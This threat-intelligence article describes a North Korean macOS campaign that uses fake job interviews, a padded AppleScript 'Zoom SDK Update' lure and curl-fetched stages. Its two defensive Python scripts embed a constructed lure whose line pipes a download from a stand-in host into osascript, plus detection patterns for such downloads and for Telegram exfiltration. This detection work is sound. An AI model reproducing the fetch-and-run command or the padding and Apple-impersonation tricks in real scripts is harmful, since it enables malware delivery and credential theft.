Key Takeaways
- North Korean threat group Sapphire Sleet (a Lazarus Group offshoot that overlaps with the cluster other vendors track as APT38) uses social engineering on LinkedIn to lure finance professionals with fake job offers and technical interviews.
- The attack chain begins with a malicious AppleScript file named Zoom SDK Update.scpt that masquerades as a legitimate Zoom software update for macOS.
- The script employs obfuscation techniques (thousands of blank lines, a harmless-looking softwareupdate call, and dynamically curl-fetched payloads) to slip past user suspicion and security controls.
- Subsequent stages harvest credentials and steal cryptocurrency wallets, browser data, keychains, Apple Notes, and Telegram login details while abusing native Apple tools and mimicking Apple-style naming (e.g., com.apple.cli, systemupdate.app, icloudz).
- Apple has responded with platform-level protections, including Safari Safe Browsing blocks and XProtect signatures, but user education remains critical: never run unsolicited scripts or commands without IT approval.
Background of Sapphire Sleet
Microsoft’s threat intelligence team tracks a North Korean state-backed cybercrime unit as Sapphire Sleet; the cluster overlaps with what other vendors designate APT38 and is regarded as an offshoot of the infamous Lazarus Group. Active since at least 2020, the crew concentrates on the financial sector, aiming to exfiltrate cryptocurrency wallets, blockchain-related intellectual property, and any data that can be monetized or used to fund the regime’s illicit activities. Their focus on finance professionals makes them adept at crafting convincing lures that appear as legitimate career opportunities.
Initial Social‑Engineering Tactics
The campaign starts with the creation of bogus recruiter profiles on professional networking sites such as LinkedIn. Posing as headhunters for prestigious fintech firms, the attackers contact targets with enticing job offers and subsequently schedule a technical interview. This interview serves as the delivery mechanism for the malware; the victim is coached to expect a software‑related task, lowering their guard when asked to download a file or run a command during the “interview” process.
The Fake Zoom SDK Update Lure
During the arranged interview, Sapphire Sleet sends the victim a meeting invitation that purports to be from Zoom support. Attached, or linked, is a file named Zoom SDK Update.scpt. When opened on macOS, a .scpt file does not execute on its own; it opens in the native Script Editor application, where the victim is then talked into pressing Run. The script presents itself as a legitimate software update: the initial view shows a large comment block filled with plausible update instructions, deliberately designed to reassure the user that nothing out of the ordinary is occurring.
Obfuscation Through Blank Lines and Harmless Calls
Beneath the benign‑looking header, the script contains thousands of blank lines that push the malicious logic far below the visible area of the Script Editor window, making it unlikely that a casual glance will reveal the harmful code. The first executable instruction invokes the legitimate macOS softwareupdate binary with an invalid parameter. This call does nothing useful but launches a trusted, Apple‑signed process, reinforcing the impression that a genuine system update is underway.
Dynamic Multi‑Stage Payload Delivery
After the innocuous softwareupdate call, the script executes a curl command that fetches a second AppleScript from an attacker‑controlled server. This second script runs within the same Script Editor context and, in turn, pulls down additional payloads via successive curl requests. Each stage uses a distinct User‑Agent string, allowing the attackers to track which victim is at which point in the infection chain while keeping the traffic blended with normal web requests.
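The obfuscation described in the two sections above (blank-line padding, a decoy softwareupdate call, curl-fetched stages with custom User-Agent strings) can be triaged statically. The following Python script is an added example, not Microsoft's analysis tooling or anything recovered from the campaign. It assumes the .scpt has first been converted to source text (on macOS, `osadecompile file.scpt` does this) and runs over a constructed sample lure; the hostname example.invalid, the bogus option name, the User-Agent value and the padding length are all placeholders.

```python
"""Static triage of a decompiled AppleScript lure (added example)."""
import re
import sys

# Constructed sample lure, NOT the real file. The blank-line padding is
# shortened here but still pushes the payload far below the visible window.
SAMPLE_LURE = (
    "-- Zoom SDK Update\n"
    "-- Step 1: this script refreshes the Zoom meeting SDK components.\n"
    "-- Step 2: leave the Script Editor window open until it finishes.\n"
    + "\n" * 3000
    + 'do shell script "softwareupdate --bogus-flag > /dev/null 2>&1"\n'
    + "do shell script \"curl -s -A 'Mozilla/5.0 zoom-sdk/1.0' "
      "https://example.invalid/stage2 | osascript\"\n"  # placeholder host
)

BLANK_RUN_THRESHOLD = 200  # assumption: benign scripts rarely pad this much
# Options documented in softwareupdate(8); anything else is a bogus call
SOFTWAREUPDATE_OPTS = {"-l", "--list", "-i", "--install", "-a", "--all",
                       "-r", "--recommended", "-d", "--download",
                       "--fetch-full-installer", "--history", "--background"}

SHELL_RE = re.compile(r'do shell script\s+"((?:[^"\\]|\\.)*)"')
INTERPRETER_RE = re.compile(r"\|\s*(osascript|sh|bash|zsh|python3?)\b")
USER_AGENT_RE = re.compile(
    r"""(?:-A|--user-agent)\s+(?:'([^']*)'|"([^"]*)"|(\S+))""")


def longest_blank_run(text):
    """Longest run of consecutive blank lines (the off-screen padding)."""
    run = best = 0
    for line in text.splitlines():
        if line.strip() == "":
            run += 1
            best = max(best, run)
        else:
            run = 0
    return best


def shell_commands(text):
    """Shell command strings handed to AppleScript's `do shell script`."""
    return [m.group(1).replace('\\"', '"') for m in SHELL_RE.finditer(text)]


def triage(text):
    """Return (category, detail) findings for one decompiled script."""
    findings = []
    run = longest_blank_run(text)
    if run >= BLANK_RUN_THRESHOLD:
        findings.append(("padding", f"{run} consecutive blank lines"))
    for cmd in shell_commands(text):
        words = cmd.split()
        base = words[0].rsplit("/", 1)[-1] if words else ""
        if base == "softwareupdate":
            # A real update call uses a documented option; a decoy does not.
            opt = words[1] if len(words) > 1 else ""
            if opt not in SOFTWAREUPDATE_OPTS:
                findings.append(("bogus_softwareupdate", cmd))
        if base == "curl":
            m = INTERPRETER_RE.search(cmd)
            if m:
                findings.append(("remote_script_exec",
                                 f"curl output piped to {m.group(1)}"))
            ua = USER_AGENT_RE.search(cmd)
            if ua:
                findings.append(("custom_user_agent",
                                 next(g for g in ua.groups() if g)))
    return findings


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LURE
    for category, detail in triage(text):
        print(f"[{category}] {detail}")
```

Run it with the path to a decompiled script, or with no argument to see the findings for the constructed sample. The per-stage User-Agent strings it extracts are the values worth turning into proxy or EDR network searches, since each one maps to a step in the chain.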
Purpose‑Built Malware Modules
The successive payloads serve specialized functions:
- Orchestration and backdooring establish a persistent foothold on the compromised machine.
- Reconnaissance modules gather system information, installed applications, and network details.
- C2 registration registers the infected host with Sapphire Sleet’s command‑and‑control infrastructure.
- TCC bypass abuse leverages native macOS APIs to circumvent Transparency, Consent, and Control protections that guard privacy‑sensitive data.
- Credential and data harvesting extracts wallets, browser histories, keychains, Apple Notes, Telegram login details, and other valuable information, which is then exfiltrated via the Telegram Bot API.
Disguising Malicious Activity with Apple‑Style Naming
To evade detection, the attackers meticulously mimic legitimate Apple components. A host-monitoring binary is named com.apple.cli, giving it the appearance of a core macOS utility. The credential stealer drops a malicious application called systemupdate.app that, when launched, displays a password dialog virtually identical to the authentic macOS “software update” prompt, coaxing users into entering their administrator credentials. Another backdoor, dubbed icloudz, masquerades as an iCloud-related artifact and uses the NSCreateObjectFileImageFromMemory API to load a Mach-O bundle straight from a memory buffer, so the follow-on code never has to be written to disk and leaves little for file-based scanning to find.
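A hunting pass over endpoint telemetry, as an added example that is not Apple's, Microsoft's, or any EDR vendor's detection logic. The event records are constructed with an assumed schema (process-exec events carrying pid, ppid, path and a signer label; network events carrying the destination host), and the pids, user paths and signer values are placeholders. It flags the three behaviours described above: curl launched from a scripting host, processes that claim an Apple identity by name without Apple's signature or an Apple-owned location, and Telegram Bot API traffic from anything other than the Telegram client. Payload names beyond those on this page are assumptions.

```python
"""Hunting rules over constructed macOS endpoint telemetry (added example)."""

# Locations where Apple-owned executables legitimately live (assumption).
APPLE_ROOTS = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/Apple/")
# Processes from which a spawned curl is suspicious in this campaign.
SCRIPT_HOSTS = {"osascript", "Script Editor"}
# Name fragments that borrow Apple's identity; "com.apple." is checked too.
APPLE_LOOKALIKE_TOKENS = ("systemupdate", "icloud", "softwareupdate")
TELEGRAM_API = "api.telegram.org"

# Constructed events; pids, paths and signer labels are placeholders.
EVENTS = [
    {"type": "exec", "pid": 501, "ppid": 410, "name": "Script Editor",
     "path": "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor",
     "signer": "Apple"},
    {"type": "exec", "pid": 512, "ppid": 501, "name": "curl",
     "path": "/usr/bin/curl", "signer": "Apple"},
    {"type": "exec", "pid": 520, "ppid": 1, "name": "com.apple.cli",
     "path": "/Users/alice/Library/Caches/com.apple.cli", "signer": "adhoc"},
    {"type": "exec", "pid": 530, "ppid": 1, "name": "systemupdate",
     "path": "/Users/alice/Library/Application Support/systemupdate.app/Contents/MacOS/systemupdate",
     "signer": "unsigned"},
    {"type": "exec", "pid": 540, "ppid": 1, "name": "softwareupdate",
     "path": "/usr/sbin/softwareupdate", "signer": "Apple"},
    {"type": "net", "pid": 520, "name": "com.apple.cli",
     "dst_host": TELEGRAM_API, "dst_port": 443},
    {"type": "net", "pid": 600, "name": "Telegram",
     "dst_host": TELEGRAM_API, "dst_port": 443},
    {"type": "net", "pid": 512, "name": "curl",
     "dst_host": "example.invalid", "dst_port": 443},
]


def claims_apple_identity(ev):
    """True when the process name or path borrows Apple-style naming."""
    name = ev["name"].lower()
    path = ev["path"].lower()
    return (name.startswith("com.apple.")
            or any(t in name for t in APPLE_LOOKALIKE_TOKENS)
            or any(t in path for t in APPLE_LOOKALIKE_TOKENS))


def hunt(events):
    """Return (rule, pid, detail) alerts for a list of telemetry events."""
    by_pid = {e["pid"]: e for e in events if e["type"] == "exec"}
    alerts = []
    for ev in events:
        if ev["type"] == "exec":
            # Apple naming is only credible with Apple's signature and an
            # Apple-owned path; the real softwareupdate passes both checks.
            if claims_apple_identity(ev) and (
                    ev["signer"] != "Apple"
                    or not ev["path"].startswith(APPLE_ROOTS)):
                alerts.append(("apple_impersonation", ev["pid"],
                               f'{ev["path"]} signer={ev["signer"]}'))
            parent = by_pid.get(ev["ppid"])
            if ev["name"] == "curl" and parent and parent["name"] in SCRIPT_HOSTS:
                alerts.append(("scripted_download", ev["pid"],
                               f'curl spawned by {parent["name"]}'))
        elif ev["type"] == "net":
            # Bot API traffic from anything but the Telegram client itself.
            if ev["dst_host"] == TELEGRAM_API and ev["name"] != "Telegram":
                alerts.append(("telegram_bot_api", ev["pid"],
                               f'{ev["name"]} -> {TELEGRAM_API}:{ev["dst_port"]}'))
    return alerts


if __name__ == "__main__":
    for rule, pid, detail in hunt(EVENTS):
        print(f"{rule:20} pid={pid:<5} {detail}")
```

The signer check is the important one: the attackers' naming trick only works against rules that look at names, and a query that joins process name to code-signing identity and install path collapses com.apple.cli and systemupdate.app into ordinary unsigned binaries in a user-writable directory. The Telegram rule will need an exception list in environments where legitimate bots run from servers.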
Apple’s Response and Mitigations
Microsoft disclosed the campaign to Apple, prompting the latter to deploy platform‑level defenses. Safari now includes Safe Browsing protections that detect and block the malicious infrastructure associated with Sapphire Sleet, while macOS receives automatic XProtect signature updates capable of identifying and quarantining the malware families used in the attack. These updates are silent to end users, requiring no manual intervention. Nevertheless, technical controls alone cannot stop social engineering; human vigilance remains essential.
Recommendations for Organizations and Individuals
To defend against similar attacks, organizations should:
- Conduct regular security awareness training that emphasizes the dangers of unsolicited LinkedIn messages, job offers, and requests to download software or join virtual meetings.
- Enforce strict policies prohibiting the execution of scripts or code received via email, messaging platforms, or chat without prior approval from IT or security teams.
- Implement endpoint detection and response (EDR) solutions capable of flagging abnormal curl or osascript behavior, even when signed Apple binaries are involved.
- Ensure macOS devices are kept up to date so that Apple-provided protections (Safe Browsing, XProtect) are always active.
- Adopt the principle of least privilege, limiting users’ ability to install unsigned applications or alter system settings without administrative approval.
By combining technical safeguards with informed user behavior, enterprises can markedly reduce the risk posed by Sapphire Sleet’s sophisticated blend of social engineering and macOS‑specific malware.
Staying vigilant against seemingly routine requests—especially those that arrive under the guise of career opportunities or software updates—is the most effective line of defense against North Korean‑linked threat actors seeking to steal credentials and cryptocurrency.

